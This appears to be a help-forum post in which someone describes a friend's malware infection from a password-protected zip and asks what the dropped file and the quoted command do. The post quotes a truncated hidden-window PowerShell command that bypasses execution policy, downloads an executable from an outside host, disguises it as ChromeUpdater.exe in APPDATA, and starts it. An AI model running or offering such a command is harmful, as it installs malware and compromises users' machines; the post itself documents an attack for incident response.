A friend downloaded a file that had a password protected zip file with a link to the password.
The link ran the following command.
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('https://a.pomf.gocataclysm.com/soyotxfbtgoj.exe','%APPDATA%\ChromeUpdater.exe');Start-Process '%AP
I assume that the command downloaded 'soyotxfbtgoj.exe' to the users APPDATA folder and renamed it ChromeUpdater.exe. I don't know what Start-Process '%AP does though.
After the user clicked the link chrome crashed and they shutdown and called me. I deleted the ChromeUpdater.exe from the users app data and I'm currently running malware bytes scan and a windows defender scan.
Any thoughts on what else I should do and what the Start-Process '%AP part of the command does.